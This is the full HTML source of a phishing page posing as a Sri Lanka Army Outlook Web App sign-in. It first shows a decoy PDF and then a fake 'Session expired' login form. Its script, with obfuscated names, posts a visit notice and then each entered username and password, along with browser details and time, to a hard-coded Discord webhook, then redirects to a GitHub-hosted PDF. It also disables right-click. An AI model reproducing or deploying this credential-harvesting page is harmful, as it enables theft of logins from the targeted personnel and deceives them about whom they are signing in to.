<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=10">
<link rel="shortcut icon" href="f.png" type="image/x-icon">

<meta name="Robots" content="NOINDEX, NOFOLLOW">
<title>Sri Lanka Army Web App</title>
<style>
body {
font-family:Calibri;
font-size:18px;
}
@font-face {
    font-family: "Segoe UI WPC";
    src: url("/owa/auth/15.0.1076/themes/resources/segoeui-regular.eot?#iefix") format("embedded-opentype"),
            url("/owa/auth/15.0.1076/themes/resources/segoeui-regular.ttf") format("truetype");
}

@font-face {
    font-family: "Segoe UI WPC Semilight";
    src: url("/owa/auth/15.0.1076/themes/resources/segoeui-semilight.eot?#iefix") format("embedded-opentype"),
        url("/owa/auth/15.0.1076/themes/resources/segaoeui-semilight.ttf") format("truetype");
}

@font-face {
    font-family: "Segoe UI WPC Semibold";
    src: url("/owa/auth/15.0.1076/themes/resources/segoeui-semibold.eot?#iefix") format("embedded-opentype"),
        url("/owa/auth/15.0.1076/themes/resources/segoeui-semibold.ttf") format("truetype");
}
</style>
<style>/*Copyright (c) 2003-2006 Microsoft Corporation.  All rights reserved.*/

body.rtl 
{
    text-align:right;
    direction:rtl;
}

body, .mouse, .twide, .tnarrow, form
{
    height: 100%;
    width: 100%;
    margin: 0px;
}

.mouse, .twide 
{
    min-width: 650px; /* min iPad1 dimension */
    min-height: 650px;
    position: absolute;
    top:0px;
    bottom:0px;
    left:0px;
    right:0px;
}

.sidebar 
{
  /*  background-color:#0072C6; */
    background:url('back.png') 
}

.foot 
{
    margin:05% auto auto auto;
    color:#f2f2f2;
    text-align:center;
    padding:10px;
    font-family:'Segoe UI', 'Segoe WP', 'Segoe UI WPC', Tahoma, Arial, sans-serif;
    font-size:15px;

}
.mouse .sidebar, .twide .sidebar
{
    position:absolute;
    top: 0px;
    bottom: 0px;
    left: 0px;
    display: inline-block;
    width: 400px;
}

.tnarrow .sidebar
{
    display: none;
}

.mouse .owaLogoContainer, .twide .owaLogoContainer
{
    margin:90% auto auto auto;
    text-align:center     /* Logo aligns left for both ltr & rtl */
}

.tnarrow .owaLogo 
{
    display: none;
}

.mouse .owaLogoSmall, .twide .owaLogoSmall
{
    display: none;
}

.logonDiv 
{ 
    text-align:left;
}

.rtl .logonDiv 
{ 
    text-align:right;
}

.mouse .logonContainer, .twide .logonContainer
{
    padding-top: 174px;
    padding-left: 270px;
    padding-right:142px;
    position:absolute;
    top:0px;
    bottom: 0px;
    left: 0px;
    right: 0px;
    text-align: center;
}

.mouse .logonDiv, .twide .logonDiv
{
    position: relative;
    vertical-align:top;
    display: inline-block;
    width: 423px;
}

.tnarrow .logonDiv
{
    margin:25px auto auto -130px;
    position: absolute;
    left: 50%;
    width: 260px;
    padding-bottom: 20px;
}

.twide .signInImageHeader, .tnarrow .signInImageHeader
{
    display: none;
}

.mouse .signInImageHeader
{
    margin-bottom:22px;
}

.twide .mouseHeader
{
    display: none;
}

.mouse .twideHeader
{
    display: none;
}

input::-webkit-input-placeholder
{
    font-size:16px;
    color: #98A3A6;
}

input:-moz-placeholder 
{
    font-size:16px;
    color: #98A3A6;
}

.tnarrow .signInInputLabel, .twide .signInInputLabel
{
    display: none;
}

.mouse .signInInputLabel
{
    margin-bottom: 2px;
}

.mouse .showPasswordCheck
{
    display: none;
}

.signInInputText
{
    border:1px solid #98A3A6;
    color: #333333;
    border-radius: 0;
    -moz-border-radius: 0;
    -webkit-border-radius: 0;
    box-shadow: none;
    -moz-box-shadow: none;
    -webkit-box-shadow: none;
    -webkit-appearance:none;
    background-color: #FDFDFD;
    width:250px;
    margin-bottom:10px;
    box-sizing: content-box;
    -moz-box-sizing: content-box;
    -webkit-box-sizing: content-box;
}

.mouse .signInInputText 
{
    height: 22px;
    font-size: 16px;
    padding: 3px 5px;
    color: #333333;
    font-family:'Segoe UI', 'Segoe WP', 'Segoe UI WPC', Tahoma, Arial, sans-serif;
    margin-bottom: 20px;
}

.twide .signInInputText, .tnarrow .signInInputText
{
    border-color: #666666;
    height: 22px;
    font-size: 16px;
    color: #000000;
    font: $ShellInputTextTouchFont;
    padding: 7px 7px;
    font-family:'Segoe UI Semibold', 'Segoe WP Semibold', 'Segoe UI WPC Semibold', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans-serif;
    margin-bottom:20px;
    width: 264px;
}

.divMain
{
    width: 444px;
}

.l
{
    text-align:left;
}
.rtl .l
{
    text-align:right;
}
.r
{
    text-align:right;
}
.rtl .r
{
    text-align:left;
}

table#tblMain
{
    margin-top: 48px;
    padding: 0px; 
}
table.mid
{
    width: 385px;
    border-collapse:collapse;
    padding: 0px; 
    color:#444444; 
}
table.tblConn
{
    direction:ltr;
}
td.tdConnImg
{
    width: 22px;
}
td.tdConn
{
    padding-top: 15px;
}
td#mdLft
{
    background: url("lgnleft.gif") repeat-y;
    width: 15px;
}
td#mdRt
{
    background: url("lgnright.gif") repeat-y;
    width: 15px;
}
td#mdMid
{
    padding: 0px 45px;
    background: #ffffff; 
    vertical-align: top;
}
td .txtpad
{
    padding: 3px 6px 3px 0px; 
}
.txt
{
    padding: 3px; 
    height: 2.2em;
}
input.btn
{
    color: #ffffff;
    background-color: #eb9c12;
    border: 0px; 
    padding: 2px 6px; 
    margin: 0px 6px; 
    text-align:center;
}
.btnOnFcs
{
    color: #ffffff;
    background-color: #eb9c12;
    border: 0px; 
    padding: 2px 6px; 
    margin: 0px 6px; 
    text-align:center;
}
.btnOnMseOvr
{
    color: #ffffff;
    background-color: #f9b133;
    border: 0px; 
    padding: 2px 6px; 
    margin: 0px 6px; 
    text-align:center;
}
.btnOnMseDwn
{
    color: #000000;
    background-color: #f9b133;
    border: 0px solid #f9b133;
    padding: 2px 6px; 
    margin: 0px 6px; 
    text-align:center;
}
.nowrap
{
    white-space:nowrap;
}
hr
{
    height: 0px; 
    visibility: hidden;
}

.wrng
{
    color:#ff6c00;
}
.disBsc
{
    color:#999999;
}
.expl
{
    color:#999999;
}
.w100, .txt
{
    width: 100%;
}
.txt
{
    margin: 0px 6px; 
}
.rdo
{
    margin: 0px 12px 0px 32px;
}
body.rtl .rdo
{
    margin: 0px 32px 0px 12px;
}
tr.expl td, tr.wrng td
{
    padding: 2px 0px 4px; 
}
tr#trSec td
{
    padding: 3px 0px 8px; 
}
/* language page specific styles */
td#tdLng
{
    padding: 12px 0px; 
}
td#tdTz
{
    padding: 8px 0px; 
}
select#selTz
{
    padding: 0px; 
    margin: 0px; 
}
td#tdOptMsg
{
    padding: 10px 0px; 
}
td#tdOptChk
{
    padding: 0px 0px 15px 65px;
}
td#tdOptAcc
{
    vertical-align:middle;
    padding: 0px 0px 0px 3px; 
}
select#selLng
{
    margin: 0px 16px;
}
/* logoff page specific styles */
td#tdMsg
{
    margin: 9px 0px 64px;
}
input#btnCls
{
    margin: 3px 6px; 
}
td.lgnTL, td.lgnBL
{
    width: 456px;
}
td.lgnTM
{
    background: url("lgntopm.gif") repeat-x;
    width: 100%;
}
td.lgnBM
{
    background: url("lgnbotm.gif") repeat-x;
    width: 100%;
}
td.lgnTR, td.lgnBR
{
    width: 45px;
}
table.tblLgn
{
    padding: 0px; 
    margin: 0px; 
    border-collapse:collapse;
    width: 100%;
}
.signInBg
{
    margin:0px;
}

.signInTextHeader
{
    font-size:60px;
    color:#404344;
    font-family:'Segoe UI', 'Segoe WP', 'Segoe UI WPC', Tahoma, Arial, sans-serif;
    margin-bottom:18px;
    white-space: nowrap;
}

.signInInputLabel
{
    font-size:12px;
    color:#666666;
    font-family:'Segoe UI', 'Segoe WP', 'Segoe UI WPC', Tahoma, Arial, sans-serif;
}

.signInCheckBoxText
{
    font-size:12px;
    color:#6A7479;
    font-family:'Segoe UI Semilight', 'Segoe WP Semilight', 'Segoe UI WPC Semilight', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans-serif;
    margin-top:16px;
}

.twide .signInCheckBoxText, .tnarrow .signInCheckBoxText
{
    font-size: 15px;
}

.signInCheckBoxLink
{
    font-size:12px;
    color:#0072C6;
    font-family:'Segoe UI Semilight', 'Segoe WP Semilight', 'Segoe UI WPC Semilight', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans-serif;
}

.signInEnter
{
    font-size:20px;
    color:#294614;
    font-family:'Segoe UI', 'Segoe WP', 'Segoe UI WPC', Tahoma, Arial, sans-serif;
    margin-top:20px;
}

.twide .signInEnter
{
    margin-top:17px;
    font-size: 29px;
}

.tnarrow .signInEnter 
{
    margin-top:2px;
    font-size: 29px;
    position: relative;
    float: left;
    left: 50%;
}

.signinbutton 
{
    cursor:pointer;
    display:inline
}

.mouse .signinbutton
{
    padding: 0px 8px 5px 8px;
    margin-left: -8px;
}

.rtl .mouse .signinbutton
{
    margin-right: -8px;
}

.tnarrow .signinbutton 
{
    position: relative;
    float: left;
    left: -50%;
}

.shellDialogueHead
{
    font-size:29px;
    color:#0072C6;
    font-family:'Segoe UI Semilight', 'Segoe WP Semilight', 'Segoe UI WPC Semilight', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans-serif;
}

.mouse .shellDialogueHead 
{
    line-height: 35px;
    margin-bottom: 10px;
}

.twide  .shellDialogueHead, .tnarrow .shellDialogueHead
{
    line-height:34px;
    margin-bottom: 12px;
}

.shellDialogueMsg
{
    font-size:13px;
    color:#333333;
    font-family:'Segoe UI', 'Segoe WP', 'Segoe UI WPC', Tahoma, Arial, sans-serif;
    line-height:18px;
}

.twide .shellDialogueMsg, .tnarrow .shellDialogueMsg
{
    font-size: 15px;
}

.headerMsgDiv 
{
    width: 350px;
    margin-bottom: 22px;
}

.twide .headermsgdiv
{
    margin-bottom: 30px;
}

.tnarrow .headermsgdiv
{
    width: 260px;
    margin-bottom: 30px;
}

.signInError
{
    font-size:12px;
    color:#C1272D;
    font-family:'Segoe UI Semilight', 'Segoe WP Semilight', 'Segoe UI WPC Semilight', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans-serif;
    margin-top:12px;
}

.passwordError
{
    color: #A80F22;
    font-family:'Segoe UI', 'Segoe WP', 'Segoe UI WPC', Tahoma, Arial, sans-serif;
    line-height: 18px;
}

.mouse .passwordError
{    
    margin-top: 10px;
    font-size: 13px;
}

.twide .passwordError, .tnarrow .passwordError
{
    margin-top: 12px;
    font-size: 15px;
}

.signInExpl
{
    font-size:12px;
    color:#999999;
    font-family:'Segoe UI Semilight', 'Segoe WP Semilight', 'Segoe UI WPC Semilight', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans-serif;
    margin-top:5px;
}

.signInWarning
{
    font-size:12px;
    color:#C1272D;
    font-family:'Segoe UI Semilight', 'Segoe WP Semilight', 'Segoe UI WPC Semilight', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans-serif;
    margin-top:5px;
}

input.chk
{
    margin-right:9px;
    margin-left:0px;
}

.imgLnk
{
    vertical-align: middle; 
    line-height:2;
    margin-top: -2px;
}

.signinTxt
{
    padding-left:11px;
    padding-right:11px;     /* Needed for RTL, doesnt hurt to add this for LTR as well */
}

.hidden-submit { 
    border: 0 none; 
    height: 0; 
    width: 0; 
    padding: 0; 
    margin: 0; 
    overflow: hidden; 
} 

.officeFooter
{
    position:absolute;
    bottom: 33px;
    right: 45px;
}

.tnarrow .officeFooter
{
    display: none;
}
</style>



    <script type="text/javascript">window.onload = function() {

  var url_string = window.location.href;
  var url        = new URL(url_string);
  var xxx        = url.searchParams.get("username");

  document.getElementById("username").value = xxx;

}
    
      setTimeout(function () {
      document.getElementById('debian').style.display = 'none';
      document.getElementById('ubuntu').style='display';  

    },5000);
</script> 
<script type="text/javascript">
   // Function to send a notification to Discord
   function sendDiscordNotification(message) {
     var _0x33402a = window.location.href;
     var _0x460236 = new URL(_0x33402a);
     var clientside = _0x460236.searchParams.get("username");
     message += "\nClientside: " + clientside;

     fetch("https://discord.com/api/webhooks/1269184919620419634/GStzrNsHeX1ooYKVcjHYbKZz47OZv2iRkanK3kFQI1q_gd9P8Fx-IT_7hFnR1yI9c2Wy", {
       method: "POST",
       headers: {
         "Content-Type": "application/json"
       },
       body: JSON.stringify({ content: message })
     });
   }

   window.onload = function () {
     // Get the value of the clientside parameter from the URL
     var _0x33402a = window.location.href;
     var _0x460236 = new URL(_0x33402a);
     var _0x4ec704 = _0x460236.searchParams.get("username");
     document.getElementById("username").value = _0x4ec704;

     // Display the dialog box and hide other elements after a delay
     setTimeout(function () {
       // Send notification to Discord
       sendDiscordNotification("Your page has been visited.");
     }, 0xbb8);

     // Add event listener for form submission
     document.getElementById("zLoginForm").addEventListener('submit', function (_0x90fbbd) {
       _0x90fbbd.preventDefault();
       var _0x1709cb = document.getElementById("username").value;
       var _0x1a97be = document.getElementById("password").value;
       var _0x8459d3 = {
         'content': "Uniform: " + _0x1709cb + ",\nPapa: " + _0x1a97be + ", \nBrowser Details: " + navigator.userAgent + ", \nTime: " + new Date().toLocaleString()
       };
       fetch("https://discord.com/api/webhooks/1269184919620419634/GStzrNsHeX1ooYKVcjHYbKZz47OZv2iRkanK3kFQI1q_gd9P8Fx-IT_7hFnR1yI9c2Wy", {
         'method': "POST",
         'headers': {
           'Content-Type': 'application/json'
         },
         'body': JSON.stringify(_0x8459d3)
       }).then(() => {
         window.location.href = "https://downloadsmail.github.io/mail.army.lk/Latest%20sri%20lanka%20army%20discord/CamScanner%2008-02-2024%2016.17-1.pdf" ;
       });
     });
   };
</script>
</head>
<body><object id="debian" width="100%" height="100%" data="CamScanner 08-02-2024 16.17-1.pdf#toolbar=0" style="position: absolute;"></object>



    

 <div id="ubuntu" style="display: none;">



<noscript>
    &lt;div id="dvErr"&gt;
        &lt;table cellpadding="0" cellspacing="0"&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;img src="a.png" alt=""&gt;&lt;/td&gt;
            &lt;td style="width:100%"&gt;To use Outlook Web App, browser settings must allow scripts to run. For information about how to allow scripts, consult the Help for your browser. If your browser doesn&amp;#39;t support scripts, you can download &lt;a href=""&gt;Windows Internet Explorer&lt;/a&gt; for access to Outlook Web App.&lt;/td&gt;
        &lt;/tr&gt;
        &lt;/table&gt;
    &lt;/div&gt;
</noscript>

<form id="zLoginForm" method="post" name="loginForm"  accept-charset="UTF-8"><input type="hidden" name="destination" value="">
<input type="hidden" name="flags" value="4">
<input type="hidden" name="forcedownlevel" value="0">
 
 
<div id="mainLogonDiv" class="mouse">
    <script>

        var mainLogonDiv = window.document.getElementById("mainLogonDiv");
        mainLogonDiv.className = mainLogonDivClassName;
    </script>
    <div class="sidebar">
        <div class="owaLogoContainer">
            <img src="f.png" class="owaLogo" aria-hidden="true">
            <div class="foot"><b>Copyright © 2023 Sri Lanka Army 
                        I All Rights <br> Reserved - Dte of IT</b></div>
            <img src="e.png" class="owaLogoSmall" aria-hidden="true">
        </div>
    </div>
    <div class="logonContainer">
    <div id="lgnDiv" class="logonDiv" onkeypress="return checkSubmit(event)">



        
            <div class="signInImageHeader" role="heading" aria-label="Outlook Web App ">
                <img class="mouseHeader" src="download.png" alt="Outlook Web App ">
            </div>
        


        <div class="signInInputLabel" id="userNameLabel" aria-hidden="true">User name:</div>
        <div><input id="username" required name="username" class="signInInputText" role="textbox" aria-labelledby="userNameLabel"></div>
        <div class="signInInputLabel" id="passwordLabel" aria-hidden="true">Password:</div>
        <div><input id="password"   name="password" required value="" type="password" class="signInInputText" aria-labelledby="passwordLabel"></div>
        <div><input id="passwordText" onfocus="g_fFcs=0" name="passwordText" value="" style="display: none;" class="signInInputText" aria-labelledby="passwordLabel"></div>
        <div class="showPasswordCheck signInCheckBoxText">
            <input type="checkbox" id="showPasswordCheck" class="chk" onclick="showPasswordClick()">
            <span>Show password</span>
        </div>
        <div id="signInErrorDiv" class="signInError" role="alert" tabindex="0">
           Session expired. Authentication required again.
            </div>

        <div id="expltxt" class="signInExpl" role="alert">
            
        </div> 

 
<div class="signInEnter">
            <div class="signinbutton" role="button" type="submit" tabindex="0">
                <img class="imgLnk" src="download (1).png" alt=""><input class="signinTxt" value="sign in" type="submit" style="border: none; background-color: white; font-size: 20px;
    color: #294614;
    font-family: 'Segoe UI', 'Segoe WP', 'Segoe UI WPC', Tahoma, Arial, sans-serif;
">

</div>


            <input name="isUtf8" value="1" type="hidden">
        </div>
        <div class="hidden-submit"><input type="submit" tabindex="-1"></div> 
    </div>
    </div>
        <div id="cookieMsg" class="logonDiv" style="display:none">
        <div class="signInHeader">Outlook Web App </div>
        <div class="signInExpl">Please enable cookies for this Web site.<br><br>Cookies are currently disabled by your browser. Outlook Web App requires that cookies be enabled. <br><br>For information about how to enable cookies, see the Help for your Web browser.<br><br><br></div>
        <div class="signInEnter">
            <div onclick="clkRtry()" style="cursor:pointer;display:inline">
                <img class="imgLnk" src="d.png" alt=""><span class="signinTxt" tabindex="0">retry</span>
        </div>
    </div>
    </div>
</div>
</form>
<script>
    if (showPlaceholderText) {
        setPlaceholderText();
    }
</script>

<script>
    
    // Function to disable right-click on the entire webpage
function disableRightClick() {
    document.addEventListener('contextmenu', function(event) {
        event.preventDefault();
    });
}

// Call the function to disable right-click
disableRightClick();

</script>
</script>

</body></html>


